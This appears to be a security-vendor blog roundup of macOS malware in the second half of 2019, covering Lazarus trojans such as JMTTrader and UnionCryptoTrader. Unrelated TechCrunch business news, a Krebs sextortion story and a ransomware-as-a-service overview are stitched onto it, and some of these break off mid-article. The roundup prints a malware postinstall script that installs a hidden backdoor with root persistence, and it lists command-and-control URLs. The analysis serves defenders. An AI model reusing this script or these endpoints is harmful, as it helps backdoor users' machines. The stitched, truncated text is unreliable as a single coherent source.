MacOS Malware Outbreaks 2019 | The Second 6 Months

Earlier this year, we did a roundup of the first 6 months of MacOS malware in 2019, noting that there had been quite an uptick in outbreaks, from a return of OSX.Dok and Lazarus to new cryptominers, a fake WhatsApp trojan and the rapid development of a macOS bug which allowed remotely-hosted attacker code to execute on a local machine without warning from Gatekeeper. So what have attackers been up to since then, and what new tricks and tips do defenders need to be aware of? Let’s take a look at macOS malware from July to December, 2019.

image macos malware second half 2019

OSX/Tarmac – What’s New?

The early months of the second half of 2019 were encouraging for defenders. We didn’t see any new outbreaks through July and August, although there was plenty of increased activity from known threats, which we will mention later. The first sign of something stirring was a report of what was claimed to be a new malware threat dubbed “Tarmac” by researchers at Confiant, which sent many of us scrambling for a sample. The story was picked up by ZDNet and a few other outlets a few weeks later.

In their initial report, Confiant did link to a long list of known Shlayer samples, and reported that their Tarmac sample was a second stage payload that was sometimes, but not reliably, dropped by some of those.

With Confiant’s assistance (much thx @lordx64 🙂 ), we were finally able to get a look at the sample they labelled Tarmac, and which is now also available on VirusTotal.

image of osx tarmac on virustotal

There’s no doubt that this is malware, but our analysis showed it to be a variant of what at SentinelOne we internally call “BundleMeUp”, and which is more widely known as “Mughthesec”. Patrick Wardle did a nice write up of the first variant back in 2017, which we detect as OSX.BundleMeUp.A. The “B” variant analysed by Confiant is only one of eight variants detected by us since 2018.

Nevertheless, Confiant did a very nice technical analysis here, which is well worth a read for anyone interested in learning macOS malware reverse engineering.

At the time of their analysis, Confiant weren’t seeing any detections for the sample on VirusTotal, perhaps leading them to make the assumption they had discovered something new. Alas, as VT themselves warn, it’s an error to take the findings on VT as indicative of what vendors’ actual engines really detect. That’s because many of the engines supplied to VT are limited versions of what vendors’ actually supply to their own customers.

Sample: 3dd5a87482f46e88fc8a8f849f21768646af987100fd38c1a0bcc2a6a8a5a073

Lazarus Take 1: OSX/GMERA, Stockfoli

September was not without real incident, however, as the first in a series of Lazarus macOS malware samples came to light in the form of OSX.GMERA. Since we wrote this up at the time, we’ll refer readers to our post here on SentinelLabs rather than repeat the whole analysis here.

Here’s the malicious run.sh script that is hidden in the Resources folder and contains encoded base64. The obfuscated code drops a hidden plist file called .com.apple.upd.plist in the user’s Library LaunchAgents folder.

image of Lazarus Stockfoli malware

However, the tl;dr was that the threat actors had bundled a real stock and crypto portfolio app inside their own almost identically named trojan app. Unsuspecting users running the malware would be presented with all the functionality of the real app, but unwittingly install a backdoor allowing the cybercriminals full access to their device through a reverse shell.

Sample: d2eaeca25dd996e4f34984a0acdc4c2a1dfa3bacf2594802ad20150d52d23d68

Lazarus Take 2: JMTTrader

Almost exactly a month after news broke about OSX.GMERA came another Lazarus discovery: JMTTrader. Following a pattern seen earlier with Celas Trade Pro, JMTTrader appears to be a completely fake organization set up with the express purpose of swindling unwary users out of cryptocurrency.

A fake company website offering “Advanced trading functions for cryptocurrency traders that includes: technical and fundamental analysis, automated trading and many other innovative features” was used to lure victims to a Github repo containing malware hidden inside an otherwise functional application.

Distributed in the form of an Apple disk image, the .dmg file contained a package which installed the trading app along with the malware, hidden inside the innocent-sounding CrashReporter executable installed in /Library/JMTTrader/CrashReporter. For persistence, a root-level LaunchDaemon is dropped at /Library/LaunchDaemons/org.jmtrading.plist.

#!/bin/sh
mv /Applications/JMTTrader.app/Contents/Resources/.org.jmttrading.plist /Library/LaunchDaemons/org.jmttrading.plist
chmod 644 /Library/LaunchDaemons/org.jmttrading.plist
mkdir /Library/JMTTrader
mv /Applications/JMTTrader.app/Contents/Resources/.CrashReporter /Library/JMTTrader/CrashReporter
chmod +x /Library/JMTTrader/CrashReporter
/Library/JMTTrader/CrashReporter Maintain &

Here we take a look at the package using the excellent Suspicious Package inspection tool:

gif image of Lazarus JMT Trader malware

According to this analysis, which is worth reading in full, the CrashReporter executable opens a backdoor to an encrypted C2 server at https://beastgoc.com/grepmonux.php and appears to have the ability to execute commands, write files and exfiltrate data.

image of Lazarus JMT Trader malware

Sample: 4d6078fc1ea6d3cd65c3ceabf65961689c5bc2d81f18c55b859211a60c141806

Lazarus Take 3: FlashUpdateCheck, Album.app

Hot on the heels of JMTTrader came another, different Lazarus find from @cyberwar_15, packaged in the form of an application called “Album.app”.

image of Lazarus Album tweet

Although this malware only came to light in October, it was signed during, and presumably in circulation since, May of this year.

image of Lazarus Album app malware

The Album.app presents itself as a Macromedia Flash player and does indeed present an “album” of pictures, showing a portfolio of images of young Asian and Korean girls. Meanwhile, it also installs a persistence agent at ~/Library/LaunchAgents/com.adobe.macromedia.flash.plist and bearing the label FlashUpdate. A hidden mach-o binary is also deposited at ~/.FlashUpdateCheck, which functions as the Program Argument for the Launch Agent.

The FlashUpdateCheck executable calls out to several IPs:

https://crabbedly.club/board.php
https://craypot.live/board.php
https://indagator.club/board.php

image of Lazarus flash update check malware

Although these were no longer live during our analysis, research suggests that the payload is the same backdoor payload we described earlier this year here.

Sample: d91c233b2f1177357387c29d92bd3f29fab7b90760e59a893a0f447ef2cb4715

Lazarus Take 4: UnionCryptoTrader

2019 is still not done seeing Lazarus activity on macOS, however, and December has seen yet another variant, UnionCryptoTrader.

This malware seems like a duplicate of the JMTTrader scam, complete with fake company website and a disk image with a malicious package hidden inside a purpose-built, “innocent” parent application. However, there are significant differences.

First, while the postinstall script in the package takes almost identical form, save for changing the filenames from .CrashReporter and .orgjmttrading.plist for .unioncryptoupdater and .vip.unioncrypto.plist, the LaunchDaemon Program Arguments also drop the Maintain argument, possibly to avoid earlier detection algorithms.

A diff of the code in the two backdoor executables, however, shows they are very different, and the newer mach-o reveals some (possibly intentional) breadcrumbs like macmini and Barbeque in the strings.

/Volumes/Work/Loader/macos/Barbeque/
barbeque.cpp
/Users/macmini/Library/Developer/Xcode/DerivedData/macloader-

More interesting is that the newer .unioncryptoupdater imports an API allowing the attackers to mimic “fileless” malware:

image of Lazarus trader malware

This shows an interesting development and marks out UnionCryptoTrader as a significant re-tooling from the earlier JMTTrader code.

Sample: 2ab58b7ce583402bf4cbc90bee643ba5f9503461f91574845264d4f7e3ccb390

What Else Happened in macOS Malware in 2019?

The second half of 2019 was, in some respects, quiet in terms of outbreaks, with APT Lazarus stealing the show (and the money) and little evidence of other APTs or new actors targeting macOS coming to light, thankfully. That said, there was also a clear trend over the last 6 months of known-actors changing tactics and becoming more aggressive at the same time.

Commodity macOS adware/malware (it’s becoming difficult to separate the two) has shown some important trends over the last 6 months or so. First, perhaps in response to Apple’s Notarization and other security enhancements, threat actors have become far more blatant in simply instructing users on how to disable their own built-in protections.

image how to bypass mac os security

Second, we’re seeing a rising trend of cybercriminals offering up executables that eschew the typical Apple format of a bundle containing a mach-o executable. Instead, they are increasingly serving up executable scripts that dump a first-stage mach-o payload in the /tmp folder, execute in order to download the second stage adware, PUP, or malware and then delete the initial stager.

Thirdly, as we’ve mentioned before, 2019 has seen bad actors target users in more aggressive ways, running malware from /var/root and dropping multiple persistence agents to thwart removal by simple end user tools.

Prior to 2019, we rarely saw macOS malware developers using anything other than plain-to-see LaunchDaemons and LaunchAgents. This year, we’ve seen more incidents of these hiding with both a dot prefix and/or chflags to conceal persistence agents from inspection in the Finder. We’ve also seen an uptick in the use of cron jobs for persistence. As some of the legacy and lower-end protection tools catch up to these basic tricks, we expect the bad actors to up their game in 2020 and increase their sophistication.

Conclusion

It’s been a year of two halves on the macOS malware outbreaks front. The first six months showed a number of diverse actors ready, willing and able to spend time and effort targeting macOS users. From July onwards, however, the main APT threat actor has been North-Korean backed Lazarus / Hidden Cobra, while a relentless plague of known but evolving commodity malware, adware and PUPs seem to be coalescing into a symbiotic group ready to sell PPI installs to each other and share the profits.

One thing that remains clear, though, whether it’s commodity malware socially engineering users to bypass the built-in macOS security controls or advanced persistent threat groups setting up fake companies and developing functional apps in order to deliver hidden malware, there’s never been more need to ensure that your endpoints do not rely on reputational, signature-based software that can only recognize threats that have already been revealed. In order to stay truly protected, an active EDR solution that blocks malicious behaviour regardless of its source or origin is the only way to protect the integrity of your data, services and customers.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Huckleberry raises $18M to put small business insurance online

The insurance industry, sleepy and ancient, is ripe for disruption. We’ve seen companies like Lemonade, Hippo and Rhino get in on that opportunity. Today, an insurtech company focused on small business insurance has raised $18 million to keep growing.

Meet Huckleberry, whose Series A was led by Tribe Capital, with participation from Amaranthine, Crosslink Capital and Uncork Capital.

Huckleberry launched in 2017 to offer business insurance, including workers’ compensation and general liability, all through an online portal.

Small business insurance coverage is not like car insurance or renters insurance. It’s not as simple as filling out a few forms and getting a quote. Even if a few platforms do have algorithms for providing quotes, you can’t really close the deal unless you get on the phone.

It’s an incredibly tedious and stressful process. In fact, Huckleberry co-founders Bryan O’Connell and Steve Au first came up with the idea for Huckleberry when they were seeking out their own small business coverage for a previous startup idea.

The industry itself is incredibly fragmented, which is caused in part by the fact that small business coverage underwriting varies wildly from business to business. For example, the policy for three or four restaurants might look relatively similar. However, a fast food restaurant might be identified as a higher risk with regards to workers’ compensation than a Michelin-star restaurant, where workers might be more eager to get back to work and take home their tip money. These differences come in the form of location, operations and many other factors, as well as business vertical.

Huckleberry has worked to build out myriad coverage verticals, including food and beverage, fitness, retail, legal, healthcare, hair and beauty and more.

The firm offers worker’s comp, as well as a package policy that includes general liability, property and business interruption insurance. Customers also can purchase add-ons like hired and non-owned auto insurance, employment practices liability insurance (EPLI), liquor liability insurance, employee dishonesty coverage, professional liability insurance, equipment breakdown coverage and spoilage coverage.

Huckleberry isn’t itself an insurance carrier, but does have the authority to underwrite and sell policies on behalf of the carrier. That said, Huckleberry’s expansion both by vertical and geography is more difficult than your average software startup. The regulatory landscape of insurance in the U.S. goes state by state.

“Our biggest challenge is navigating 50 states’ worth of extremely complicated regulations on something that is much more complicated than a software product,” said O’Connell. “We’re trying to protect individual workers and businesses all while staying fully compliant in every market.”

SAP spinout Sapphire Ventures raises $1.4B for new investments

Sapphire Ventures, the former corporate venture arm of SAP, has raised $1.4 billion for growth investments, including a $150 million opportunity fund to support larger deals.

The firm, which focuses primarily on enterprise tech companies in the U.S., Europe and Israel, writes checks to Series B through pre-IPO businesses. Its portfolio includes 23andMe, Sumo Logic and TransferWise.

The new funds brings Sapphire Ventures, which became independent from the German software company SAP in 2011, assets under management to north of $4 billion. Sapphire will write checks sized between $5 million and $100 million with the new funds, allowing the team “to do any financing we need to or want to,” chief executive officer and managing director Nino Marakovic tells TechCrunch. Sapphire’s fourth growth fund is the firm’s largest to date, at more than double the size of their $700 million Fund III. 

“We need this fund because companies are staying private much longer because they want to get to a $200 million revenue run rate before they go public,” Sapphire Ventures president and co-founder Jai Das (pictured) tells TechCrunch. “We want to have the capital to support these companies as they keep growing.”

News of the fund comes nearly one year after Sapphire Ventures lassoed $115 million from new limited partners to invest at the intersection of tech, sports, media and entertainment. Sapphire Sport has ties to the sports industry, from City Football Group, which owns English Premier League team Manchester City, to Adidas, the owners of the Indiana Pacers, New York Jets, San Jose Sharks and Tampa Bay Lightning, among others.

Before that, the firm closed on $1 billion for its third flagship venture fund.

With seven check writers and another seven investment professionals focused on growth-stage investments, Sapphire has had a number of recent wins, counting a total of 21 initial public offerings and 55 exits since the firm’s inception.

“We’re excited to have now reached critical mass with $4 billion under management,” Marakovic said. “We are the right size to take advantage of our target area of early and later-stage enterprise software companies. We are innovating on the model by adding value-add LPs and trying to align our whole model of services to the target companies to serve them as best as possible.”

Tech startups going public raise 3x more today than in 2015

Hello and welcome back to our regular morning look at private companies, public markets and the grey space in between.

Today we’re exploring the 2019 IPO cohort from a capital-in perspective. How much did tech companies going public in 2019 raise before they went public, and what impact that did that have on their valuation when they debuted?

Looking ahead, the tech startups and other venture-backed companies expected to go public in 2020 will include a similar mix of mid-sized offerings, unicorn debuts and perhaps a huge direct listing. What we’ve seen in 2019 should be a good prelude to the 2020 IPO market.

With that in mind, let’s examine how much money tech companies that went public this year raised before their IPO. Spoiler: It’s a lot more than was normal just a few years ago. Afterwards, I have a question regarding what to call companies in the $100 million ARR club (more here) that we’ve been exploring lately. Let’s go!

Privately rich

According to CBInsights’ recent IPO 2020 IPO report, there’s a sharp, upward swing in the amount of capital that tech companies raise before they go public. It’s so steep that the data draw a nearly linear breakout from a preceding, comfortable normal.

Here’s the chart:

There are two distinct periods; from 2012 to 2015, raising up to $100 million was the norm (median) for tech companies going public. That’s still a lot of cash, mind.

The second period is more exciting. From 2016 on we can see a private capital arms race in which tech companies going public stacked ever-greater sums under their mattresses before debuting. This is generally consistent with a different trend that you are also aware of, namely the rise of $100 million financings.

Before we turn back to the CBInsights data, let’s observe a chart from Crunchbase News that underscores the simply astounding rise of $100 million financings that was published just a few weeks ago. As you look at this chart, remember that prior to 2016, more than half of venture-backed technology companies going public had raised less than $100 million total:

Now, compare the two data sets.

Three SaaS companies we think will make it to $1B in revenue

What’s the most successful pure SaaS company of all time? The answer is Salesforce, and it’s no contest — the company closed the year on an $18 billion run rate, placing it in a category no other company born in the cloud can touch.

That Salesforce is on such an impressive run rate might suggest that reaching a billion in revenue is a fairly easy proposition for an enterprise SaaS company, but firms in this category grow or drive revenue like Salesforce. Some, in fact, find themselves growing much more slowly than anyone thought, but keep slugging it out as they inch steadily toward the $1 billion mark. This happens to public and private SaaS companies alike, which means that we can look at few public ones thanks to their regular earnings disclosures.

It’s a good time to look back at the year and analyze a few firms that should reach the mythical $1 billion in revenue at some point. Today we’re examining Zuora, a SaaS player focused on building and managing subscription-based services. GuideWire, a company transitioning to SaaS with big ambitions and Box, a well-known SaaS player caught somewhere between big and a billion.

Zuora: betting on SaaS

We’ll start with the smallest company that caught our eye, Zuora . We’ll proceed from here going up in revenue terms.

Zuora is as pure a SaaS company as you can imagine. The San Mateo-based company raised nearly a quarter billion dollars while private to build out the technology that other companies use to help build their own subscription-based businesses. To some degree, Zuora’s success can be viewed as a proxy for SaaS as a whole.

However, while SaaS has chugged along admirably, Zuora has seen its share price fall by more than half in recent quarters.

At issue is the firm’s slowing growth:

  • In the quarter detailed on March 21, 2019, Zuora’s subscription revenue growth slowed to 35% compared to the prior year period. Total revenue growth grew an even slower at 29%.
  • In the quarter announced on May 30, 2019, Zuora’s subscription revenue grew 32% while its total revenue expanded 22%.
  • Moving forward in time, the company’s quarter reported on August 28, 2019 saw subscription revenue growth of 24% and total revenue growth of 21% compared to the year-ago quarter.
  • Finally, in its most recent quarterly report earlier this month, Zuora reported marginally better 25% subscription revenue growth, but slower total revenue growth of 17%.

Why is Zuora’s growth slowing? There’s no single reason to point out. Reading through coverage of the firm’s earnings report reveals a number of issues that the company has dealt with this year, including slow sales rep ramp and some technology complaints. Add in Stripe’s meteoric rise (the unicorn added tools for subscription billing in 2018, expanding the product to Europe earlier this year) and you can see why Zuora has had a tough year.

Adding to its difficulties, the company has lost more money while its growth has slowed. Zuora’s net loss expanded from $53.6 million in the three calendar quarters of 2018. That rose to $59.9 million over the same period in 2019. But the news is not all bad.

In spite of these numbers, Zuora is still growing; the company expects around $276 to $278 million in revenue in its current fiscal year and between $206 and $207 million in subscription top-line revenue over the same period.

At the revenue growth pace set in its most recent quarter (17% in the third quarter of its fiscal 2020) the company is eight years from reaching $1 billion in revenue. However, Zuora’s rising subscription growth rate in the same period is very encouraging. And, the company’s cash burn is declining. Indeed, in the most recent quarter Zuora’s operations generated cash. That improvement led to the firm’s free cash flow improving by half in the first three calendar quarters of 2019.

It also has pedigree on its side. Founder and CEO Tien Tzuo was employee number 11 at Salesforce when the company launched in 1999. He left the company in 2007 to start Zuora after realizing that traditional accounting methods designed to account for selling a widget wouldn’t work in the subscription world.

Zuora’s subscription revenue is high-margin, but the rest of its revenue (services, mostly) is not. So, with less thirst for cash and modestly improving subscription revenue growth, Zuora is still on the path towards the next revenue threshold despite a rough past year.

Guidewire: going SaaS the hard way

Satori Cyber raises $5.25M to help businesses protect their data flows

The amount of data that most companies now store — and the places they store it — continues to increase rapidly. With that, the risk of the wrong people managing to get access to this data also increases, so it’s no surprise that we’re now seeing a number of startups that focus on protecting this data and how it flows between clouds and on-premises servers. Satori Cyber, which focuses on data protecting and governance, today announced that it has raised a $5.25 million seed round led by YL Ventures.

“We believe in the transformative power of data to drive innovation and competitive advantage for businesses,” the company says. “We are also aware of the security, privacy and operational challenges data-driven organizations face in their journey to enable broad and optimized data access for their teams, partners and customers. This is especially true for companies leveraging cloud data technologies.”

Satori is officially coming out of stealth mode today and launching its first product, the Satori Cyber Secure Data Access Cloud. This service provides enterprises with the tools to provide access controls for their data, but maybe just as importantly, it also offers these companies and their security teams visibility into their data flows across cloud and hybrid environments. The company argues that data is “a moving target” because it’s often hard to know how exactly it moves between services and who actually has access to it. With most companies now splitting their data between lots of different data stores, that problem only becomes more prevalent over time and continuous visibility becomes harder to come by.

“Until now, security teams have relied on a combination of highly segregated and restrictive data access and one-off technology-specific access controls within each data store, which has only slowed enterprises down,” said Satori Cyber CEO and co-founder Eldad Chai. “The Satori Cyber platform streamlines this process, accelerates data access and provides a holistic view across all organizational data flows, data stores and access, as well as granular access controls, to accelerate an organization’s data strategy without those constraints.”

Both co-founders (Chai and CTO Yoav Cohen) previously spent nine years building security solutions at Imperva and Incapsula (which acquired Imperva in 2014). Based on this experience, they understood that onboarding had to be as easy as possible and that operations would have to be transparent to the users. “We built Satori’s Secure Data Access Cloud with that in mind, and have designed the onboarding process to be just as quick, easy and painless. On-boarding Satori involves a simple host name change and does not require any changes in how your organizational data is accessed or used,” they explain.

Odoo grabs $90M to sell more SMEs on its business app suite

Belgium-based all-in-one business software maker Odoo, which offers an open source version as well as subscription-based enterprise software and SaaS, has taken in $90 million led by a new investor: Global growth equity investor Summit Partners.

The funds have been raised via a secondary share sale. Odoo’s executive management team and existing investor SRIW and its affiliate Noshaq also participated in the share sale by buying stock — with VC firms Sofinnova and XAnge selling part of their shares to Summit Partners and others.

Odoo is largely profitable and grows at 60% per year with an 83% gross margin product; so, we don’t need to raise money,” a spokeswoman told us. “Our bottleneck is not the cash but the recruitment of new developers, and the development of the partner network.

“What’s unusual in the deal is that existing managers, instead of cashing out, purchased part of the shares using a loan with banks.”

The 2005-founded company — which used to go by the name of OpenERP before transitioning to its current open core model in 2015 — last took in a $10M Series B back in 2014, per Crunchbase.

Odoo offers some 30 applications via its Enterprise platform — including ERP, accounting, stock, manufacturing, CRM, project management, marketing, human resources, website, eCommerce and point-of-sale apps — while a community of ~20,000 active members has contributed 16,000+ apps to the open source version of its software, addressing a broader swathe of business needs.

It focuses on the SME business apps segment, competing with the likes of Oracle, SAP and Zoho, to name a few. Odoo says it has in excess of 4.5 million users worldwide at this point, and touts revenue growth “consistently above 50% over the last ten years”.

Summit Partners told us funds from the secondary sale will be used to accelerate product development — and for continued global expansion.

“In our experience, traditional ERP is expensive and frequently fails to adapt to the unique needs of dynamic businesses. With its flexible suite of applications and a relentless focus on product, we believe Odoo is ideally positioned to capture this large and compelling market opportunity,” said Antony Clavel, a Summit Partners principal who has joined the Odoo board, in a supporting statement.

Odoo’s spokeswoman added that part of the expansion plan includes opening an office in Mexico in January, and another in Antwerpen, Belgium, in Q3.

This report was updated with additional comment

Google details its approach to cloud-native security

Over the years, Google’s various whitepapers, detailing how the company solves specific problems at scale, have regularly spawned new startup ecosystems and changed how other enterprises think about scaling their own tools. Today, the company is publishing a new security whitepaper that details how it keeps its cloud-native architecture safe.

The name, BeyondProd, already indicates that this is an extension of the BeyondCorp zero trust system the company first introduced a few years ago. While BeyondCorp is about shifting security away from VPNs and firewalls on the perimeter to the individual users and devices, BeyondProd focuses on Google’s zero trust approach to how it connects machines, workloads and services.

Unsurprisingly, BeyondProd is based on pretty much the same principles as BeyondCorp, including network protection at the end, no mutual trust between services, trusted machines running known code, automated and standardized change rollout and isolated workloads. All of this, of course, focuses on securing cloud-native applications that generally communicate over APIs and run on modern infrastructure.

“Altogether, these controls mean that containers and the microservices running inside can be deployed, communicate with each other, and run next to each other, securely; without burdening individual microservice developers with the security and implementation details of the underlying infrastructure,” Google explains.

Google, of course, notes that it is making all of these features available to developers through its own services like GKE and Anthos, its hybrid cloud platform. In addition, though, the company also stresses that a lot of its open-source tools also allow enterprises to build systems that adhere to the same platforms, including the likes of Envoy, Istio, gVisor and others.

“In the same way that BeyondCorp helped us to evolve beyond a perimeter-based security model, BeyondProd represents a similar leap forward in our approach to production security,” Google says. “By applying the security principles in the BeyondProd model to your own cloud-native infrastructure, you can benefit from our experience, to strengthen the deployment of your workloads, how your their communications are secured, and how they affect other workloads.”

You can read the full whitepaper here.

Nuclear Bot Author Arrested in Sextortion Case

Last summer, a wave of sextortion emails began flooding inboxes around the world. The spammers behind this scheme claimed they’d hacked your computer and recorded videos of you watching porn, and promised to release the embarrassing footage to all your contacts unless a bitcoin demand was paid. Now, French authorities say they’ve charged two men they believe are responsible for masterminding this scam. One of them is a 21-year-old hacker interviewed by KrebsOnSecurity in 2017 who openly admitted to authoring a banking trojan called “Nuclear Bot.”

On Dec. 15, the French news daily Le Parisien published a report stating that French authorities had arrested and charged two men in the sextortion scheme. The story doesn’t name either individual, but rather refers to one of the accused only by the pseudonym “Antoine I.,” noting that his first had been changed (presumably to protect his identity because he hasn’t yet been convicted of a crime).

“According to sources close to the investigation, Antoine I. surrendered to the French authorities at the beginning of the month, after being hunted down all over Europe,” the story notes. “The young Frenchman, who lived between Ukraine, Poland and the Baltic countries, was indicted on 6 December for ‘extortion by organized gang, fraudulent access to a data processing system and money laundering.’ He was placed in pre-trial detention.”

According to Le Parisien, Antoine I. admitted to being the inventor of the initial 2018 sextortion scam, which was subsequently imitated by countless other ne’er-do-wells. The story says the two men deployed malware to compromise at least 2,000 computers that were used to blast out the sextortion emails.

While that story is light on details about the identities of the accused, an earlier version of it published Dec. 14 includes more helpful clues. The Dec. 14 piece said Antoine I. had been interviewed by KrebsOnSecurity in April 2017, where he boasted about having created Nuclear Bot, a malware strain designed to steal banking credentials from victims.

My April 2017 exposé featured an interview with Augustin Inzirillo, a young man who came across as deeply conflicted about his chosen career path. That path became traceable after he released the computer code for Nuclear Bot on GitHub. Inzirillo outed himself by defending the sophistication of his malware after it was ridiculed by both security researchers and denizens of the cybercrime underground, where copies of the code wound up for sale. From that story:

“It was a big mistake, because now I know people will reuse my code to steal money from other people,” Inzirillo told KrebsOnSecurity in an online chat.

Inzirillo released the code on GitHub with a short note explaining his motivations, and included a contact email address at a domain (inzirillo.com) set up long ago by his father, Daniel Inzirillo.

KrebsOnSecurity also reached out to Daniel, and heard back from him roughly an hour before Augustin replied to requests for an interview. Inzirillo the elder said his son used the family domain name in his source code release as part of a misguided attempt to impress him.

“He didn’t do it for money,” said Daniel Inzirillo, whose CV shows he has built an impressive career in computer programming and working for various financial institutions. “He did it to spite all the cyber shitheads. The idea was that they wouldn’t be able to sell his software anymore because it was now free for grabs.”

If Augustin Inzirillo ever did truly desire to change his ways, it wasn’t clear from his apparent actions last summer: The Le Parisien story says the sextortion scams netted the Frenchman and his co-conspirator at least a million Euros.

In August 2018, KrebsOnSecurity was contacted by a researcher working with French authorities on the investigation who said he suspected the young man was bragging on Twitter that he used a custom version of Nuclear Bot dubbed “TinyNuke” to steal funds from customers of French and Polish banks.

The source said this individual used the now-defunct Twitter account @tiny_gang1 to taunt French authorities, while showing off a fan of 100-Euro notes allegedly gained from his illicit activities (see image above). It seemed to the source that Inzirillo wanted to get caught, because at one point @tiny_gang1 even privately shared a copy of Inzirillo’s French passport to prove his identity and accomplishments to the researcher.

“He modified the Tinynuke’s config several times, and we saw numerous modifications in the malware code too,” the source said. “We tried to compare his samples with the leaked code available on GitHub and we noticed that the guy actually was using a more advanced version with features that don’t exist in the publicly available repositories. As an example, custom samples have video recording functionality, socks proxy and other features. So the guy clearly improved the source code and recompiled a new version for every new campaign.”

The source said the person behind the @tiny_gang Twitter account attacked French targets with custom versions of TinyNuke in one to three campaigns per week earlier this year, harvesting French bank accounts and laundering the stolen funds via a money mule network based mostly in the United Kingdom.

“If the guy behind this campaign is the malware author, it could easily explain the modifications happening with the malware, and his French is pretty good,” the researcher told KrebsOnSecurity. “He’s really provocative and I think he wants to be arrested in France because it could be a good way to become famous and maybe prove that his malware works (to resell it after?).”

The source said the TinyNuke author threatened him with physical harm after the researcher insulted his intelligence while trying to goad him into disclosing more details about his cybercrime activities.

“The guy has a serious ego problem,” the researcher said. “He likes when we talk about him and he hates when we mock him. He got really angry as time went by and started personally threatening me. In the last [TinyNuke malware configuration file] targeting Poland we found a long message dedicated to me with clear physical threats.”

All of the above is consistent with the findings detailed in the Le Parisien report, which quoted French investigators saying Antoine I. in October 2019 used a now-deleted Twitter account to taunt the authorities into looking for him. In one such post, he included a picture of himself holding a beer, saying: “On the train to Naples. You should send me a registered letter instead of threatening guys informally.”

The Le Parisien story also said Antoine I. threatened a researcher working with French authorities on the investigation (the researcher is referred to pseudonymously as “Marc”).

“I make a lot more money than you, I am younger, more intelligent,” Antoine I. reportedly wrote in July 2018 to Marc. “If you do not stop playing with me, I will put a bullet in your head. ”

French authorities say the defendant managed his extortion operations while traveling throughout Ukraine and other parts of Eastern Europe. But at some point he decided to return home to France, despite knowing investigators there were hunting him. According to Le Parisien, he told the French authorities he wanted to cooperate in the investigation and that he no longer wished to live like a fugitive.

Ransomware as a Service | What are Cryptonite, Recoil and Ghostly Locker?

A short while back we posted a two-part blog series on a new RaaS (Ransomware as a Service) offering, “Project Root”. If you have not had a chance to peruse Part 1 and Part 2 of that series, we highly recommend doing so. That aside, “Project Root” happens to be just one of many in a recent uptick in “publicly” available RaaS offerings. In recent months, we have been tracking others as well and would like to take this opportunity to provide a high-level overview of three of the more notable examples, all of which market themselves with a style and pitch typical of legitimate consumer marketing. In this post, we will explore the following:

  • Recoil Ransomware
  • Cryptonite
  • Ghostly (aka Ghostly Locker)
    • image RaaS Cryptonite

      Recoil Ransomware

      Recoil popped up for sale in various forums in early November 2019. Like Project Root, the main draw is a low buy-in price and a fairly standard feature set.

      image recoil banner

      Early advertisements for Recoil touted the following:

      image recoil features

      image recoil discord forum

      All these features are fairly standard for a modern RaaS service and should be taken with a healthy dose of scepticism. Claims to be “fully undetectable” (aka FUD) are misleading and only indicate two possible anti-detection capabilities. First, the developers can provide the buyer with a uniquely compiled stub that has yet to be subjected to public testing sites like VirusTotal. That means legacy AV solutions that rely on reputation for detection, such as by checking the binary’s hash, can indeed be easily bypassed. Second, some ransomware vendors offer to frequently update their code/stubs in order to stay ahead of the ‘detection curve’ – signature rules like Yara and similar that rely on detecting particular sequences of bytes or strings in an executable. However, neither of these avoidance techniques give the ransomware true “FUD” capabilities if the security solution uses advanced behavioural detection.

      Recoil also offers the ability to function (i.e. encrypt) offline, which is attractive to criminals for a few reasons, not the least of which is that it can make the payloads less ‘noisy’. That is, if there is no anomalous traffic reaching out to obviously suspicious .onion sites, then simple security controls that would be triggered by that sort of thing (IPS/IDS/Firewalls, etc.) can fail to generate alerts. Beyond that, staying offline may offer some improvement in speed by forgoing network status checks or delays while reaching out to an attacker’s server each time the payload executes. 

      As stated, Recoil’s feature set is rather standard. The deletion of shadow copies is very common and can greatly impact a victim’s ability to recover from such an attack if they are not able to restore from another form of known-good backup or if they lack a modern security solution that blocks that behavour at source.

      Current data indicates that Recoil supports Windows (x86 / x64) as well as Android. The developers are hoping to net $500.00 USD per sale, which – they say – includes support for Windows and Android platforms.

      Cryptonite Ransomware

      image cryptonite banner

      Cryptonite began advertising in forums (.onion based) a little later than Recoil, in early December 2019. They tout a fairly robust feature set, as well as a ‘deal’ to preview the system before committing to purchasing a full subscription package. By creating an account on their system, would-be ransomware criminals are able to get ‘preview’ builds which are fully functional. The idea here seems to be to offer the ability to generate income from the preview that the “buyers” would in turn use to pay for the full package.

      image cryptonite features

      The developers behind Cryptonite also appear to be offering a special deal to the first 1000 customers. The marketing is somewhat fascinating (from a security research perspective) in that they are highlighting “features” which very much focus on the exact points that security professionals recognize as the most dangerous.

      Specifically, they repeatedly highlight the point that “No Coding Skill” is required. That particular aspect is one of the main reasons we call attention to these. The barrier to entry is almost zero, meaning anyone tempted by criminal gains can rapidly cause a great deal of damage in very little time (seconds). The greatest danger with these kind of RaaS offerings is that an attacker only needs to know how to download files to start the infectious ball rolling.

      Cryptonite is currently advertising the following core features:

      • Zero ransom fees – Packages are based on “infection credits”
      • Fully Undetectable – AV Evasion
      • Unique Encryption Keys – Unique encryption keys for each infection. This aims to prevent decryption tools or use of leaked keys
      • No Coding Skills Needed – Buyers build and download payloads from the portal. No programming / coding required
      • Increasing Ransom – Ransom increases over time or per defined criteria
      • Custom File infection (append your own binaries)
      • VSS / Shadow Copy Disabling / Deletion – Attempts to delete Volume Shadow Copies to prevent OS-based remediation
      • Network Infection Option – Worm’esque feature. Attempts to identify open network shares to spread to and infect.
      • Windows Only (x86/x64)

      image cryptonite abilities

      Cryptonite offers a full management and tracking portal and a number of features which put it ahead of Recoil in terms of attractiveness to a criminal audience. The pricing model is a little different with Cryptonite as well.  Rather than taking a cut from each received ransom or charging an “entry fee”, they sell packages of what they refer to as “infection credits”. Each infected victim equals one credit. Would-be threat actors pay more for a package that allows them to infect more victims.

      Cryptonite pricing currently ranges from $195.00 to $895.00 USD and sets a limit on the amount of ransom that can be demanded per victim in each tier, from $150 to $250. For that, would-be criminals can infect between 50 and 200 victims and potentially make between $7,500 – $50,000 in total.

      The network infection and “advanced tracking” features are only included in the highest-price tier.

      image cryptonite pricing

      Along with all this, Cryptonite claims to offer 24×7 “support” via email, web-form, or even chat (when the admins are online).

      image cryptonite support

      Ghostly Locker Ransomware

      Rounding out our overview of RaaS projects is Ghostly, aka Ghostly Locker, ransomware.

      image Ghostly Locker banner

      Ghostly first appeared for sale in mid-November 2019. Similar to Recoil and Cryptonite, it is presented as a very slick and full-featured offering.

